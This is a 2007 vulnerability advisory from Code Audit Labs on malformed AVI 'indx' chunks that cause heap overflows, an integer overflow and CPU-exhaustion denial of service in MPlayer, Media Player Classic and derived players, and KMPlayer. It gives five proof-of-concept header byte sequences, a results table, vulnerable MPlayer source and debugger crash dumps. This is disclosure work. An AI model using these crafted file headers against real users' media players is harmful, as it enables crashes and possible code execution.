CAL-20070912-1 Multiple vendor produce handling AVI file vulnerabilities
Code Audit Labs (http://www.vulnhunt.com) Code Audit for some popular
media player and discovered some vulnerabilities.
one heap overflow was discovered in MPlayer.
one heap overflow and one integer overflow were discovered in media
player classic(mpc) and other produces base on mpc like mympc and
StormPlayer).
Some D.o.S (raise 100% cpu ) were discovred in KMPlayer.
By tricking a user into opening a specially crafted media file,
an attacker who exploit heap overflow in MPlayer or media player classic
could potential execute arbitrary code with the user's privileges.
Original LINK:
==============
http://www.vulnhunt.com/advisories/CAL-20070912-1_Multiple_vendor_produc
e_handling_AVI_file_vulnerabilities.txt
Affected Product
=================
1 MPlayer 1.0rc1 and prior (we tested version 20070729)
2 media player classic v6.4.9.0 and prior; and other produces base on it.
( mympc 1.0.0.1 and StormPlayer 1.0.4)
3 KMPlayer v2.9.3.1210 and prior
Technical Description
=====================
those vulnerabilities are discoered via playing with AVI
1) indx truck size
2) wLongsPerEntry
3) nEntriesInuse
Olny build 5 testcases
test case 1 (new_avihead_poc1.avi)
------------------------------------------
69 6E 64 78 FF FF FF FF 01 00 64 73 20 00 00 10
indx truck size 0xffffffff
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
test case 2 (new_avihead_poc2.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF FF FF 64 73 FF FF FF FF
indx truck size 0xffffff00
wLongsPerEntry 0xffff
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0xFFFFFFFF
test case 3 (new_avihead_poc3.avi)
------------------------------------------
69 6E 64 78 00 FF FF FF 01 11 64 73 20 00 00 10
indx truck size 0xffffff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
test case 4 (new_avihead_poc4.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 01 00 64 73 20 00 00 10
indx truck size 0x0000ff00
wLongsPerEntry 0x0001
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x10000020
test case 5 (new_avihead_poc5.avi)
------------------------------------------
69 6E 64 78 00 FF 00 00 04 00 64 73 10 00 00 40
indx truck size 0x0000ff00
wLongsPerEntry 0x0004
BIndexSubType is 0x64
bIndexType is 0x73
nEntriesInuse is 0x40000010
TEST RESULT
+---------+-----------+-----------+-----------+-----------+----------+
| produce | testcase1 | testcase2 | testcase3 | testcase4 |testcase5 |
+---------+-----------+-----------+-----------+-----------+----------+
| wmp | ok | ok | ok | ok | ok |
+---------+-----------+-----------+-----------+-----------+----------+
| mplayer | ok | ok | HO/CRASH | ok | ok |
+---------+-----------+-----------+-----------+-----------+----------+
| mpc | HO | HO | HO | ok | ok |
+---------+-----------+-----------+-----------+-----------+----------+
|KMPlayer | RAISE CPU | RAISE CPU | RAISE CPU | ok | ok |
+---------+-----------+-----------+-----------+-----------+----------+
| mympc | HO | HO | HO | ok | ok |
+---------+-----------+-----------+-----------+-----------+----------+
|StormPlay| HO | HO | HO | ok | ok |
+---------+-----------+-----------+-----------+-----------+----------+
| xplayer | ok | ok | ok | ok | ok |
+---------+-----------+-----------+-----------+-----------+----------+
LITTLE ANALYSIS
===============
MPlayer svn 20070729 (last version)
1:new_mplayer_avihead_poc3.avi null pointer in winxp or glibc 2.5(depend
on compile option).
if glibc <2.5(maybe prior) or win2000 sp4 ,it will be heap overflow.
vulnerability code in libmpdemux/aviheader.c:
232 print_avisuperindex_chunk(s,MSGL_V);
233
234 if( ((chunksize/4)/s->wLongsPerEntry) < s->nEntriesInUse){
235 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index
chunk\n");
236 s->nEntriesInUse = (chunksize/4)/s->wLongsPerEntry;
237 }
238
239 // Check and fix this useless crap
240 if(s->wLongsPerEntry != sizeof (avisuperindex_entry)/4) {
241 mp_msg (MSGT_HEADER, MSGL_WARN, "Broken super index
chunk size: %u\n",s->wLongsPerEntry);
242 s->wLongsPerEntry = sizeof(avisuperindex_entry)/4;
243 }
244 s->aIndex = calloc(s->nEntriesInUse, sizeof
(avisuperindex_entry));
245 s->stdidx = calloc(s->nEntriesInUse, sizeof
(avistdindex_chunk));
246
247 // now the real index of indices
248 for (i=0; i<s->nEntriesInUse; i++) {
249 chunksize-=16;
that's funny, the above code still can be bypassed because of
incorrect check order.
and example code
calloc(0x10000001, 0x10);
it will return NULL in winxp or gligc 2.5
it will return 0x10 sizes heap in glibc <2.5(maybe prior) or
win2000 sp4
0:000> g
(54c.284): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02a7e740 ebx=024eecb8 ecx=00000000 edx=01414930 esi=ffffff00
edi=ffffff00
eip=0053b084 esp=0022e5e0 ebp=0000b6d0 iopl=0 nv up ei ng nz na
po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00200286
gmplayer+0x13b084:
0053b084 89741500 mov [ebp+edx],esi
ss:0023:01420000=02cc1b9e
0:000> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be
wrong.
0000b6d0 00000000 00000000 00000000 00000000 gmplayer+0x13b084
media player classic v6.4.9.0 (last version)
--------------------------------------------
there are many produces base on media player classic.
all of produces are affected.
1:new_avihead_poc1.avi heap overflow
(270.198): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=060fa8b0 ebx=060ff000 ecx=00000011 edx=00000000 esi=060fa86c
edi=060ff000
eip=006b8a4a esp=05a3f1e8 ebp=05a3f1f0 iopl=0 nv up ei pl nz ac
po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010216
*** ERROR: Module load completed but symbols could not be loaded for
C:\Documents and Settings\xx\mpc2kxp6490\mplayerc.exe
mplayerc+0x2b8a4a:
006b8a4a f3a5 rep movsd ds:060fa86c=73640001
es:060ff000=????????
0:003> kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be
wrong.
05a3f1f0 005a02d6 060ff000 060fa86c 00000044 mplayerc+0x2b8a4a
00000000 00000000 00000000 00000000 00000000 mplayerc+0x1a02d6
2: new_avihead_poc2.avi
new_avihead_poc3.avi
VERIFIER STOP 00000004: pid 0x870: extreme size request
029B0000 : Heap handle
FFFFFF08 : Size requested
00000000 :
00000000 :
(870.a88): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=ffffff08 ecx=7c93eb05 edx=05a3ea68 esi=00000004
edi=029b0000
eip=7c921230 esp=05a3ec9c ebp=05a3ecb0 iopl=0 nv up ei pl zr na
po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
ntdll!DbgBreakPoint:
7c921230 cc int 3
in a word, assume indx truck size is indx_truck_size,
the code like:
buf =malloc(indx_truck_size+8)
it will trigger integer overflow.
KMPlayer v2.9.3.1210 (last version)
-----------------------------------
1:new_avihead_poc1.avi D.o.S
2:new_avihead_poc2.avi D.o.S
3:new_avihead_poc3.avi D.o.S
DISCLOSURE TIMELINE:
====================
1: 2007-07-30 notice MPlayer vendor
2: 2007-07-31 the vendor reply
3: 2007-09-12 release this report
About Us:
=========
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com
EOF
--
Code Audit Labs
http://www.vulnhunt.com/